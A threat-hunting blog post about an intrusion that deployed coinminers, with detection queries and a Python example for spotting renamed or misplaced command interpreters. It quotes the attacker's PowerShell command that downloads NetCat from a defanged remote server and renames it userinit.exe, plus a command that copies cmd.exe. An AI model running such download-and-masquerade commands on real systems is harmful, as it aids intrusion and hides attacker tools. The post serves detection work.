192. I'm Not Sure If I Want to Masquerade It

Hello everyone! As it's Friday, let's look at a funny case, at least in my opinion. And it's one more time about masquerading. The case itself is related to exploiting public-facing applications and deploying coinminers. Nothing special. But there are a few interesting behaviors!

The adversary downloads NetCat from a remote server:

```
(New-Object Net.WebClient).DownloadFile('hXXp://212.78.4[.]241:8081/docs/nc.exe', 'C:\programdata\userinit.exe')
```

As you can see, the threat actors masqueraded NetCat to look like a legitimate process, but at the same time copied and renamed cmd.exe:

```
cmd c/ copy C:\Windows\System32\cmd.exe C:\ProgramData\c.exe
```

So, once again we are dealing with renamed command and scripting interpreters:

```
event_type: "processcreatewin" AND proc_file_originalfilename: "cmd.exe" AND NOT proc_file_name: "cmd.exe"
```

And also command and scripting interpreters in uncommon locations:

```
event_type: "processcreatewin"...
```
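To show how the two detections above behave side by side, here is an added example in Python that is not part of the original post. It applies the "renamed interpreter" rule and an "interpreter in an uncommon location" rule to a few constructed process-creation events (field names follow the query above; the interpreter list, the allowlisted directories and the `proc_file_path` field are assumptions made for the example). The events include the copied `C:\ProgramData\c.exe`, a normal cmd.exe, and the renamed NetCat binary.

```python
"""Added example (not from the original post): run the renamed-interpreter
and uncommon-location detections over constructed process-creation events."""

import ntpath

# PE OriginalFilename values of the command and scripting interpreters to
# watch for (constructed list; extend as needed).
INTERPRETERS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

# Directories where those interpreters legitimately live (constructed
# allowlist, compared case-insensitively).
EXPECTED_DIRS = {
    r"c:\windows\system32",
    r"c:\windows\syswow64",
    r"c:\windows\system32\windowspowershell\v1.0",
    r"c:\windows\syswow64\windowspowershell\v1.0",
}

# Constructed sample telemetry. proc_file_path is an assumed field name;
# the other field names come from the query in the post.
SAMPLE_EVENTS = [
    {   # cmd.exe copied to ProgramData and renamed, as in the post
        "event_type": "processcreatewin",
        "proc_file_originalfilename": "Cmd.Exe",
        "proc_file_name": "c.exe",
        "proc_file_path": r"C:\ProgramData\c.exe",
    },
    {   # ordinary cmd.exe from its usual location
        "event_type": "processcreatewin",
        "proc_file_originalfilename": "Cmd.Exe",
        "proc_file_name": "cmd.exe",
        "proc_file_path": r"C:\Windows\System32\cmd.exe",
    },
    {   # NetCat renamed to userinit.exe: not an interpreter, so neither
        # rule fires; it needs a separate detection
        "event_type": "processcreatewin",
        "proc_file_originalfilename": "nc.exe",
        "proc_file_name": "userinit.exe",
        "proc_file_path": r"C:\ProgramData\userinit.exe",
    },
    {   # PowerShell keeping its name but running from a temp directory
        "event_type": "processcreatewin",
        "proc_file_originalfilename": "PowerShell.EXE",
        "proc_file_name": "powershell.exe",
        "proc_file_path": r"C:\Users\Public\powershell.exe",
    },
]


def renamed_interpreter(event):
    """Rule 1: OriginalFilename is an interpreter but the on-disk name differs."""
    if event.get("event_type") != "processcreatewin":
        return False
    orig = event.get("proc_file_originalfilename", "").lower()
    name = event.get("proc_file_name", "").lower()
    return orig in INTERPRETERS and name != orig


def interpreter_in_uncommon_location(event):
    """Rule 2: an interpreter (by OriginalFilename) executing outside its expected directories."""
    if event.get("event_type") != "processcreatewin":
        return False
    orig = event.get("proc_file_originalfilename", "").lower()
    path = event.get("proc_file_path", "")
    if orig not in INTERPRETERS or not path:
        return False
    return ntpath.dirname(path.lower()) not in EXPECTED_DIRS


RULES = (renamed_interpreter, interpreter_in_uncommon_location)


def run_detections(events=SAMPLE_EVENTS):
    """Return {proc_file_path: [names of rules that matched]} for each event."""
    return {e["proc_file_path"]: [r.__name__ for r in RULES if r(e)] for e in events}


if __name__ == "__main__":
    for path, hits in run_detections().items():
        print(f"{path}: {', '.join(hits) if hits else 'no match'}")
```

Matching on `proc_file_originalfilename` rather than the on-disk name is what makes the copied `c.exe` visible; note that the renamed NetCat binary does not match either rule, since its OriginalFilename is not an interpreter, so that half of the case needs its own hunt (for example, on binaries in ProgramData whose OriginalFilename disagrees with their name).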